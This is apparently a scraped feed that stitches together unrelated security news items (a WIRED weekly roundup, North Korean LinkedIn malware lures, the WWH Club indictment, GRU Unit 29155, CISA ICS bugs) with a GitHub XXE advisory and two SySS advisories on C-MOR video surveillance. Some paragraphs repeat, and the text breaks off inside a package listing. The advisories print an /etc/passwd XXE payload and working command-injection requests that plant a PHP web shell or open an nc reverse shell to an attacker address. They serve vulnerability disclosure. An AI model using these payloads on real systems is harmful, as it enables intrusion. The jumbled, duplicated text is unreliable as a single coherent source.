Plus: Kaspersky’s US business sold, Nigerian sextortion scammers jailed, and Europe’s controversial encryption plans return.

Your devices may be revealing a lot more about your life than you realize.

During the Democratic National Convention in Chicago last month, we set out to find just how much data is floating around in the digital ether all around us. Armed with a fanny pack filled with radios—including a hot spot loaded with custom code developed by the digital rights nonprofit the Electronic Frontier Foundation and an Android phone armed with the data-revealing app Wiggle—WIRED reporters collected signals from nearly 300,000 devices in and around the DNC. This included more than 2,500 police body cameras, which effectively revealed how the Chicago Police Department deployed its officers at the protests. It also exposed new ways everyone—police and activists alike—can be surveilled via our gadgets.

Thanks to a legal dispute over content moderation, Elon Musk’s X has been blocked in Brazil for a week—mostly, away. The South American nation has some 20,000 internet service providers and lacks the centralized stranglehold over internet infrastructure that authoritarian countries like Iran have built. So when it comes to blocking an entire social network in Brazil, the whole thing is a bit of a mess.

Speaking of Musk-run companies, SpaceX is getting a big new customer for its Starlink satellite internet service: the United States Navy. In addition to providing sailors with a way to stay connected to friends and family while out at sea, Starlink is part of a large project to connect US warships wherever they are in the world.

Russia’s military intelligence agency, GRU, is known for having some of the most aggressive hacking teams on the planet. Now, it’s added a new one: GRU Unit 29155—a unit notorious for coup attempts, bombings, and other physical attacks—has a cyber warfare team of its own, according to the US and other Western governments. Dubbed Cadet Blizzard, the hacking team is said to have carried out attacks against Ukraine using destructive Whispergate malware, defaced Ukrainian government websites, and leaked information while posing as a hacktivist group. It all adds up to more evidence of the increasingly blurry lines between cyber and kinetic warfare.

Activists in Japan have been waging a pressure campaign against a company many people don’t know exists. The FANUC Corporation makes industrial robots, which are used for a wide variety of purposes. The activists claim this includes weapons manufacturing—specifically weapons used by Israel in its war in Gaza—and believe the company is violating export laws and its own policies. (FANUC denies both accusations.) Whatever the case, the controversy reveals how difficult it can be to untangle ethical issues from a global supply chain.

Health care companies are among the biggest targets for criminal hackers. But sometimes, the security issues come from the inside. Therapy sessions and other sensitive patient records were recently left exposed in a misconfigured database operated by Confidant Health, which provides addiction recovery care and other mental health services. The company says it secured the database immediately after a researcher alerted them to the fact that it was publicly accessible online, but it’s still a reminder of just how many of our deepest secrets can find their way into the open by accident.

Even those of you who do everything you can to secure those secrets can find yourself vulnerable—especially if you’re using a YubiKey 5 authentication token. The multifactor authentication devices can be cloned thanks to a cryptographic flaw that can’t be patched. The company has rolled out some mitigation measures—and the attack itself is relatively difficult to pull off. But it may be time to invest in a new dongle.

That’s not all, folks. Each week, we round up the privacy and security news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

At the end of August, cybercriminals from the ransomware group RansomHub appear to have hacked into the systems of Planned Parenthood’s Montana branch. The organization this week confirmed it had suffered from a “cybersecurity incident” on August 28 and said its staff immediately took parts of its network offline, reporting the incident to law enforcement.

Days after the incident took place, RansomHub claimed to be behind the attack, posting Planned Parenthood on its leak website. The criminal group said it would publish 93 GB of data. It is unclear what, if anything, the ransomware group has obtained, but Planned Parenthood clinics can hold a huge array of highly sensitive data about patients, including information on abortion appointments. (Around 400,000 Planned Parenthood patients in Los Angeles were impacted following a similar ransomware incident in 2021.)

In recent months, RansomHub has emerged as one of the most active ransomware-as-a-service groups, following the law enforcement disruption of LockBit. According to an FBI and Cybersecurity and Infrastructure Security Agency alert at the end of August, the group is “efficient and successful” and has stolen data from at least 210 victims since it formed in February. “The affiliates leverage a double-extortion model by encrypting systems and exfiltrating data to extort victims,” the alert said.

**Nigerian Sextortion Scammers Sentenced to 17 Years After Teen Death**

The Nigeria-based scammers known as the Yahoo Boys run almost every scam in the playbook—from romance scams to pretending to be FBI agents. Yet there's little-more devious than the increase in sextortion cases linked to the West African scammers. This week, Nigerian brothers Samuel Ogoshi and Samson Ogoshi were sentenced to more than 17 years in US jail for running sextortion scams, following their extradition earlier this year. It is the first time Nigerian scammers have been prosecuted for sextortion in the US, the BBC reported.

The Ogoshi brothers, who pleaded guilty in April, have been linked to the death of 17-year-old Jordan DeMay, who took his life six hours after he started talking to the scammers, who posed as a girl, on Instagram. The teenager had been duped into sending the brothers explicit images, and after he had done so, they threatened to post the images online unless he paid them hundreds of dollars. US prosecutors said the brothers sexually exploited and extorted more than 100 victims, with at least 11 of them being minors. There has been a huge spike in sextortion cases in recent years.

**Kaspersky’s Banned US Business Sold**

In June, the US Commerce Department banned the sale of Kaspersky’s antivirus tools over national security concerns about its links to the Russian government. (Kaspersky has, for years, denied connections). The firm later fired its workers and said it was closing its US business. This week, cybersecurity company Pango Group announced it is purchasing Kaspersky Lab’s US antivirus customers, according to Axios. This equates to around 1 million customers, who will be transitioned to Pango’s antivirus software Ultra AV. Ahead of the Kaspersky deal, parent company Aura also announced it was spinning out Pango Group into its own business. Pango’s president said customers would not need to take any action and that it would allow subscribers to continue to receive updates after September 29, when Kaspersky updates will stop.

**Europe’s Encryption-Busting “Chat Control” Plans Return**

For years, the EU has been trying to introduce new child protection laws that would require private chats to be scanned for child sexual abuse material—something that would potentially undermine encrypted messaging apps that provide everyday privacy to billions of people. The plans have been highly controversial and were shelved earlier this year. However, the proposed law, which has been dubbed “chat control,” reappeared in legislators’ in-trays this week. The Council of the EU, which is currently chaired by Hungary, wants to pass legislation by October, but reports say strong resistance to the plans still remain.

Hackers Threaten to Leak Planned Parenthood Data

Threat actors affiliated with North Korea have been observed leveraging LinkedIn as a way to target developers as part of a fake job recruiting operation.

These attacks employ coding tests as a common initial infection vector, Google-owned Mandiant said in a new report about threats faced by the Web3 sector.

"After an initial chat conversation, the attacker sent a ZIP file that contained

Threat actors affiliated with North Korea have been observed leveraging LinkedIn as a way to target developers as part of a fake job recruiting operation.

These attacks employ coding tests as a common initial infection vector, Google-owned Mandiant said in a new report about threats faced by the Web3 sector.

"After an initial chat conversation, the attacker sent a ZIP file that contained COVERTCATCH malware disguised as a Python coding challenge," researchers Robert Wallace, Blas Kojusner, and Joseph Dobson said.

The malware functions as a launchpad to compromise the target's macOS system by downloading a second-stage payload that establishes persistence via Launch Agents and Launch Daemons.

It's worth pointing out that this is one of many activity clusters – namely Operation Dream Job, Contagious Interview, and others – undertaken by North Korean hacking groups that make use of job-related decoys to infect targets with malware.

Recruiting-themed lures have also been a prevalent tactic to deliver malware families such as RustBucket and KANDYKORN.

Mandiant said it observed a social engineering campaign that delivered a malicious PDF disguised as a job description for a "VP of Finance and Operations" at a prominent cryptocurrency exchange.

"The malicious PDF dropped a second-stage malware known as RustBucket which is a backdoor written in Rust that supports file execution."

The RustBucket implant is equipped to harvest basic system information, communicate with a URL provided via the command-line, and set up persistence using a Launch Agent that disguises itself as a "Safari Update" in order to contact a hard-coded command-and-control (C2) domain.

North Korea's targeting of Web3 organizations also go beyond social engineering to encompass software supply chain attacks, as observed in the incidents aimed at 3CX and JumpCloud in recent years.

"Once a foothold is established via malware, the attackers pivot to password managers to steal credentials, perform internal reconnaissance via code repos and documentation, and pivot into the cloud hosting environment to reveal hot wallet keys and eventually drain funds," Mandiant said.

The disclosure comes amid a warning from the U.S. Federal Bureau of Investigation (FBI) about North Korean threat actors' targeting of the cryptocurrency industry using "highly tailored, difficult-to-detect social engineering campaigns."

These ongoing efforts, which impersonate recruiting firms or individuals that a victim may know personally or indirectly with offers of employment or investment, are seen as a conduit for brazen crypto heists that are designed to generate illicit income for hermit kingdom, which has been the subject of international sanctions.

Notable among the tactics employed include identifying cryptocurrency-related businesses of interest, conducting extensive pre-operational research on their targets before initiating contact, and concocting personalized fake scenarios in an attempt to appeal to prospective victims and increase the likelihood of success of their attacks.

"The actors may reference personal information, interests, affiliations, events, personal relationships, professional connections, or details a victim may believe are known to few others," the FBI said, highlighting attempts to build rapport and eventually deliver malware.

"If successful in establishing bidirectional contact, the initial actor, or another member of the actor's team, may spend considerable time engaging with the victim to increase the sense of legitimacy and engender familiarity and trust."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Threat Actors Deploy COVERTCATCH Malware via LinkedIn Job Scams

Two men have been indicted in the U.S. for their alleged involvement in managing a dark web marketplace called WWH Club that specializes in the sale of sensitive personal and financial information.
Alex Khodyrev, a 35-year-old Kazakhstan national, and Pavel Kublitskii, a 37-year-old Russian national, have been charged with conspiracy to commit access device fraud and conspiracy to commit wire

Two men have been indicted in the U.S. for their alleged involvement in managing a dark web marketplace called WWH Club that specializes in the sale of sensitive personal and financial information.

Alex Khodyrev, a 35-year-old Kazakhstan national, and Pavel Kublitskii, a 37-year-old Russian national, have been charged with conspiracy to commit access device fraud and conspiracy to commit wire fraud.

Khodyrev and Kublitskii, between 2014 and 2024, acted as the main administrators of WWH Club (wwh-club\[.\]ws) and various other sister sites – wwh-club\[.\]net, center-club\[.\]pw, opencard\[.\]pw, skynetzone\[.\]org – that functioned as dark web marketplaces, forums, and training centers to enable cybercrime.

The indictment follows an investigation launched by the U.S. Federal Bureau of Investigation (FBI) in July 2020 after determining that WWH Club's primary domain (www-club\[.\]ws\] resolved to an IP address belonging to DigitalOcean, allowing them to issue a federal search warrant to the infrastructure company.

"WWH Club and sister site members used the marketplaces to buy and sell stolen personal identifying information (PII), credit card and bank account information, and computer passwords, among other sensitive information," the U.S. Department of Justice (DoJ) said.

The forums, on the other hand, acted as a hotspot for discussions on best practices for committing fraud, launching cyber attacks, and evading law enforcement.

Furthermore, the darknet marketplace offered online courses for aspiring and active cyber criminals on how to conduct frauds. The advertised cost of the course ranged from 10,000 rubles to 60,000 rubles (about $110 to $664 as of September 7, 2024) and an additional $200 for training materials.

Court documents show that undercover FBI agents signed up for the site and attended a training course offered by the platform by paying approximately $1,000 in bitcoin that included topics such as the sale of sensitive information, DDoS and hacking services, credit card skimmers, and brute-force programs.

"The training was conducted through a chat function on the forum to a class of approximately 50 students; the various instructors provided training in text format rather than audible instruction," the criminal complaint reads. "It was apparent the purpose of the training was to educate individuals on how to obtain and use stolen credit card data and PII to generate fraudulent proceeds."

WWH Club is estimated to have had 353,000 users worldwide as of March 2023, up from 170,000 registered users in July 2020. Both Khodyrev and Kublitskii are believed to have profited from the membership fees, tuition fees, and advertising revenue.

Flashpoint, in a report published last month, said WWH-Club remains operational despite the law enforcement effort, and that "its other administrators are attempting to distance themselves from Kublitskii and Khodyrev."

Khodyrev and Kublitskii "had been living in Miami for the past two years, while secretly continuing to administer WWH Club and its sister dark web marketplaces, forums, and schools," the DoJ said.

If convicted on all counts, they could each face up to 20 years in federal prison. The indictment also requires Khodyrev to forfeit his 2023 Mercedes-Benz G63 AMG sport utility vehicle and Kublitskii's 2020 Cadillac CT5 Sport sedan, which are said to have been purchased using proceeds from their criminal enterprise.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

FBI Cracks Down on Dark Web Marketplace Managed by Russian and Kazakh Nationals

In the past, Putin's Unit 29155 has utilized malware like WhisperGate to target organizations, particularly those in Ukraine.

Source: vchal via Alamy Stock Photo

The United States, alongside several of its allies including the UK, are accusing the Russian military of attacking global critical infrastructure units through malicious cyber operations bent on espionage, sabotage, and reputational damage.

The FBI, NSA, and CISA have published a joint advisory assessing the cyber actors affiliated with the Russian GRU 161st Specialist Training Center, otherwise known as Unit 29155. The group has been active since 2020, but began deploying WhisperGate malware against Ukrainian organizations in January 2022.

In addition to leveraging the malware against Ukrainian victims, the group has also conducted network operations against numerous members of NATO in North America and Europe, as well as targets in Latin America and Central Asia. These operations include website defacements, infrastructure scanning, data exfiltration, and data leaking.

According to the advisory, "Unit 29155 cyber actors are known to target critical infrastructure and key resource sectors, including the government services, financial services, transportation systems, energy, and healthcare sectors."

Though overt attacks on critical infrastructure are concerning, the issue goes further than that.

"While cyberattacks against critical infrastructure are certainly concerning, it is even more concerning to imagine that adversaries could gain access to systems without our knowledge and remain hidden until an issue occurred, and could then be used to take down critical tools, utilities, or communication systems," said Erich Kron, security awareness advocate at KnowBe4. Kron cited "vendors providing services to these critical infrastructure partners" as being at high risk for related attacks as well.

Organizations can mitigate against these kinds of threats by prioritizing routine system updates and remediating known exploited vulnerabilities; segmenting networks to prevent the spread of malware or malicious activity; and enabling phishing-resistant multifactor authentication, especially for webmail, VPNs, and critical system accounts.

Feds Warn on Russian Actors Targeting Critical Infrastructure

### Impact
XSLT transforms performed by various components are vulnerable to XML external entity injections. A processed XML file with a malicious DTD tag ( `<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>` could produce XML containing data from the host system. This impacts use cases where org.hl7.fhir.core is being used to within a host where external clients can submit XML.

### Patches
This issue has been patched in release 6.3.23

### Workarounds
None.

### References
[MITRE CWE](https://cwe.mitre.org/data/definitions/611.html)
[OWASP XML External Entity Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#transformerfactory)


Skip to content

**Navigation Menu**

Sign in

**CVE-2024-45294**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   GitHub Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    Explore
    
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   By size
    
    *   Enterprise
    *   Teams
    *   Startups
    
    By industry
    
    *   Healthcare
    *   Financial services
    *   Manufacturing
    
    By use case
    
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
*   Topics
    
    *   AI
    *   DevOps
    *   Security
    *   Software Development
    *   View all
    
    Explore
    
    *   Learning Pathways
    *   White papers, Ebooks, Webinars
    *   Customer Stories
    *   Partners
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    Repositories
    
    *   Topics
    *   Trending
    *   Collections
    
*   *   Enterprise platform
        
        AI-powered developer platform
        
    
    Available add-ons
    
    *   Advanced Security
        
        Enterprise-grade security features
        
    *   GitHub Copilot
        
        Enterprise-grade AI features
        
    *   Premium Support
        
        Enterprise-grade 24/7 support
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

We read every piece of feedback, and take your input very seriously.

Include my email address so I can be contacted

**Saved searches****Use saved searches to filter your results more quickly**

Sign in

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-45294

**XXE vulnerability in XSLT transforms in \`org.hl7.fhir.core\`**

High severity GitHub Reviewed Published Sep 6, 2024 in hapifhir/org.hl7.fhir.core • Updated Sep 6, 2024

Vulnerability details Dependabot alerts 0

**Package**

maven ca.uhn.hapi.fhir:org.hl7.fhir.dstu2016may (Maven)

**Affected versions**

< 6.3.23

**Patched versions**

6.3.23

maven ca.uhn.hapi.fhir:org.hl7.fhir.dstu3 (Maven)

< 6.3.23

6.3.23

maven ca.uhn.hapi.fhir:org.hl7.fhir.r4 (Maven)

< 6.3.23

6.3.23

maven ca.uhn.hapi.fhir:org.hl7.fhir.r4b (Maven)

< 6.3.23

6.3.23

maven ca.uhn.hapi.fhir:org.hl7.fhir.r5 (Maven)

< 6.3.23

6.3.23

maven ca.uhn.hapi.fhir:org.hl7.fhir.utilities (Maven)

< 6.3.23

6.3.23

**Description**

**Impact**

XSLT transforms performed by various components are vulnerable to XML external entity injections. A processed XML file with a malicious DTD tag ( <!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]> could produce XML containing data from the host system. This impacts use cases where org.hl7.fhir.core is being used to within a host where external clients can submit XML.

**Patches**

This issue has been patched in release 6.3.23

**Workarounds**

None.

**References**

MITRE CWE  
OWASP XML External Entity Prevention Cheat Sheet

**References**

*   GHSA-59rq-22fm-x8q5
*   GHSA-6cr6-ph3p-f5rf
*   https://nvd.nist.gov/vuln/detail/CVE-2024-45294
*   https://github.com/HL7/fhir-ig-publisher/releases/tag/1.6.22
*   https://github.com/hapifhir/org.hl7.fhir.core/releases/tag/6.3.23

 dotasek published to hapifhir/org.hl7.fhir.core

Sep 6, 2024

Published by the National Vulnerability Database

Sep 6, 2024

Published to the GitHub Advisory Database

Sep 6, 2024

Reviewed

Sep 6, 2024

Last updated

Sep 6, 2024

**Severity**

High

8.6

/ 10

**CVSS base metrics**

Attack vector

Network

Attack complexity

Low

Privileges required

None

User interaction

None

Scope

Changed

Confidentiality

High

Integrity

None

Availability

None

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

**Weaknesses**

CWE-611

**CVE ID**

CVE-2024-45294

**GHSA ID**

GHSA-6cr6-ph3p-f5rf

**Source code**

hapifhir/org.hl7.fhir.core

Loading Checking history

See something to contribute? Suggest improvements for this vulnerability.

GHSA-6cr6-ph3p-f5rf: XXE vulnerability in XSLT transforms in `org.hl7.fhir.core`

The vulnerabilities affect industrial control tech used across the healthcare and critical manufacturing sectors.

Source: PopTika via Shutterstock

This week the US Cybersecurity and Infrastructure Security Agency (CISA) warned about two new industrial control systems (ICS) vulnerabilities in products widely used in healthcare and critical manufacturing — sectors prone to attract cybercrime.

The vulnerabilities affect Baxter's Connex Health Portal and Mitsubishi Electric’s MELSEC line of programmable controllers. Both vendors have issued updates for the vulnerabilities and recommended mitigations that customers of the respective technologies can take to further mitigate risk.

**Baxter Connex Vulnerabilities**

CISA's advisory contained information on two vulnerabilities in Baxter's Connex Health Portal (formerly Hillrom and Welch Allyn) that it described as remotely exploitable and involving low attack complexity. One of the vulnerabilities, assigned as CVE-2024-6795, is a maximum severity (CVSS score of 10.0) SQL injection issue that an unauthenticated attacker can leverage to run arbitrary SQL queries on affected systems. CISA described the flaw as giving attackers the ability to access, modify, and delete sensitive data and take other admin level actions, including shutting down the database.

The other vulnerability in Baxter's Connex Health Portal, tracked as CVE-2024-6796, has to do with improper access control and has a CVSS severity rating of 8.2 on 10. The flaw gives attackers a way to potentially access sensitive patient and clinician information and to modify or delete some of the data. As with CVE-2024-6795, the improper access vulnerability in Baxter Connex Health Portal is also remotely exploitable, involves low attack complexity, and does not require the threat actor to have any special privileges.

Baxter has fixed the issues, but CISA has recommended that affected organizations also minimize network exposure for all control system devices and to make sure they are not accessible from the Internet. CISA also wants organizations to stick firewalls in front of control system networks and to use secure remote access methods such as VPNs where remote access is a requirement.

So far, there is no sign of exploit activity targeting either vulnerability, CISA said. But healthcare technologies have become a major target for cybercriminals in recent years. This year alone, there have been multiple incidents involving major healthcare players. Among the most notable of them was a ransomware attack on health insurance firm Change Healthcare earlier this year that knocked critical-claims-related services offline for days. Though Change Healthcare paid a $22 million ransom to the BlackCat ransomware group following the attack, the threat actor leaked sensitive health information on millions of Americans on the Dark Web anyway. In another incident, attackers — believed to be the Rhysida ransomware group — knocked systems offline at Chicago’s Lurie Children's Hospital and compromised records belonging to more than 790,000 patients.

Multiple factors have contributed to the healthcare sector becoming a major target for cybercriminals. These include the fact that healthcare organizations usually hold a lot of valuable data and are particularly vulnerable to any kind of operational disruptions and degradation in their ability to serve patients.

**Mitsubishi MELSEC Flaws**

Meanwhile CISA's advisory on Mitsubishi Electric's MELSEC programmable controllers for industrial automation and control applications have to do with vulnerabilities the vendor announced previously. One of the advisories involves a #denial of service of vulnerability that Mitsubishi first disclosed in 2020 (CVE-2020-5652) and has kept updating through the years as new issues related to the flaw have continued to crop up. The latest advisory adds more Mitsubishi MELSEC products to the list of affected technologies and provides new information on mitigating against the threat. The other vulnerability, identified as CVE-2022-33324, is also a denial-of-service issue, but one resulting from what CISA described as improper resource shutdown or release. Mitsubishi first disclosed the flaw in December 2022 and has kept updating its advisory with new information. The latest update, which adds new products to the list of affected technologies and provides new mitigation advice, is the company's third just this year for CVE-2022-33324.

Vulnerabilities in ICS and other Information technology products in the manufacturing sector are a particular concern for two reasons: More than 75% of manufacturing companies have unpatched high-severity vulnerabilities in their environment; and attacks against manufacturing companies have surged in recent years. A report that Armis released earlier this year showed a 165% increase in attacks on manufacturing companies in 2023, making it the second-most targeted sector after utilities.

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

CISA Flags ICS Bugs in Baxter, Mitsubishi Products

C-MOR Video Surveillance versions 5.2401 and 6.00PL01 suffer from a command injection vulnerability.

Advisory ID:               SYSS-2024-030  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401, 6.00PL01  
Tested Version(s):         5.2401, 6.00PL01  
Vulnerability Type:        OS Command Injection (CWE-78)  
Risk Level:                High  
Solution Status:           Open  
Manufacturer Notification: 2024-04-05  
Solution Date:             -  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45179  
Authors of Advisory:       Matthias Deeg (SySS GmbH), Chris Beiter,  
                            Frederik Beimgraben,

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Due to insufficient input validation, the C-MOR web interface is  
vulnerable to OS command injection attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR web interface, it was found that different  
functionality is vulnerable to OS command injection attacks, for  
example for generating new X.509 certificates or setting the time zone.

The OS command injection vulnerability in the script "generatesslreq.pml"  
can be exploited as a low-privileged authenticated user (see   
SYSS-2024-024[3])  
in order to execute commands in the context of the Linux user "www-data".

The OS command injection vulnerability in the script "settimezone.pml"  
requires an administrative user for the C-MOR web interface.

By also exploiting the privilege escalation vulnerability described in  
SYSS-2024-027[4], it is possible to execute commands on the C-MOR system  
with root privileges.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

By sending the following HTTP POST request to the script  
"generatesslreq.pml", the injected OS command via the parameter  
"city" is executed as Linux user "www-data".

In this sample attack vector, a simple PHP web shell is created in  
the backup directory within the web server's webroot:

POST /generatesslreq.pml HTTP/1.1  
Host: <HOST>  
Authorization: Basic <CREDENTIALS>  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 152  
Connection: close

countrycode=de&state=state&city=city'|echo '<?php echo   
system($_GET["cmd"]);?>' > /srv/www/htdocs/backup/webshell.php   
#&organization=org&servername=syss

This PoC attack can be performed using the following curl command:

curl -X POST -d "countrycode=de&state=state&city=city'|echo '<?php echo   
system($_GET["cmd"]);?>' > /srv/www/htdocs/backup/webshell.php   
#&organization=org&servername=syss" --user "<USERNAME>:<PASSWORD>"   
--ciphers "DEFAULT:!DH" https://<HOST>/generatesslreq.pml

The uploaded web shell can be used via the following URL:

https://<HOST>/backup/web shell.php?cmd=<COMMAND>

In version 6.00PL01, an OS command injection was, for instance, possible  
using the following attack vector:

curl -X POST \  
   -d   
'hour=00&min=34&sec=27&day=06&month=06&year=2024+%26%26+nc+<ATTACKERIP>+<ATTACKER-PORT>+-e+/bin/bash+%26'   
\  
   --user "<USERNAME>:<PASSWORD>" \  
   --insecure \  
   --ciphers 'DEFAULT:!DH' \  
   https://<HOST>/en/setdatetime.pml

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The described security vulnerability has not been fixed entirely in the   
newly  
released software version 6.00PL01.

There is no fix for this security issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-030

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-030.txt  
[3] SySS Security Advisory SYSS-2024-024

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-024.txt  
[4] SySS Security Advisory SYSS-2024-027

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-027.txt  
[5] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, Frederik  
Beimgraben, and Matthias Deeg.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 / 6.00PL01 Command Injection

C-MOR Video Surveillance version 5.2401 makes use of unmaintained vulnerability third-party components.

Advisory ID:               SYSS-2024-029  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401  
Tested Version(s):         5.2401  
Vulnerability Type:        Dependency on Vulnerable Third-Party   
Component (CWE-1395)  
                            Use of Unmaintained Third Party Components   
(CWE-1104)  
Risk Level:                High  
Solution Status:           Fixed  
Manufacturer Notification: 2024-04-05  
Solution Date:             2024-07-31  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2017-9798, CVE-2017-3167, and more  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

The C-MOR system uses several outdated third-party software components  
with known security vulnerabilities.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR system, it was found that the C-MOR system depends  
on several outdated third-party software components with known security  
vulnerabilities, for instance an old Linux kernel, Apache HTTP Server  
2.2.16, PHP 5.3.3, or Python 2.6.

Some of the used software components have also reached their end of life  
and are not supported anymore by a maintainer.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following excerpt of the "dpkg-query" output illustrates some outdated  
third-party software components used on the C-MOR system:

$ sudo dpkg-query -l  
(...)  
ii  apache2                             2.2.16-6+squeeze10   
Apache HTTP Server metapackage  
ii  apache2-mpm-prefork                 2.2.16-6+squeeze10   
Apache HTTP Server - traditional non-threaded model  
ii  apache2-utils                       2.2.16-6+squeeze10   
utility programs for webservers  
ii  apache2.2-bin                       2.2.16-6+squeeze10   
Apache HTTP Server common binary files  
ii  apache2.2-common                    2.2.16-6+squeeze10   
Apache HTTP Server common files  
(...)  
ii  libapache2-mod-php5                 5.3.3-7+squeeze14   
server-side, HTML-embedded scripting language (Apache 2 module)  
(...)  
ii  libssl0.9.8                         0.9.8o-4squeeze14            SSL   
shared libraries  
(...)  
ii  linux-image-4.7.8                   c-mor-v5-00   
Linux kernel binary image for version 4.7.8  
(...)  
ii  php5                                5.3.3-7+squeeze14   
server-side, HTML-embedded scripting language (metapackage)  
rc  php5-cgi                            5.3.3-7+squeeze14   
server-side, HTML-embedded scripting language (CGI binary)  
ii  php5-cli                            5.3.3-7+squeeze14   
command-line interpreter for the php5 scripting language  
ii  php5-common                         5.3.3-7+squeeze14   
Common files for packages built from the php5 source  
ii  php5-gd                             5.3.3-7+squeeze14            GD   
module for php5  
ii  php5-mysql                          5.3.3-7+squeeze14   
MySQL module for php5  
ii  php5-suhosin                        0.9.32.1-1   
advanced protection module for php5  
(...)  
ii  python2.6                           2.6.6-8+b1                   An   
interactive high-level object-oriented language (version 2.6)  
ii  python2.6-minimal                   2.6.6-8+b1                   A   
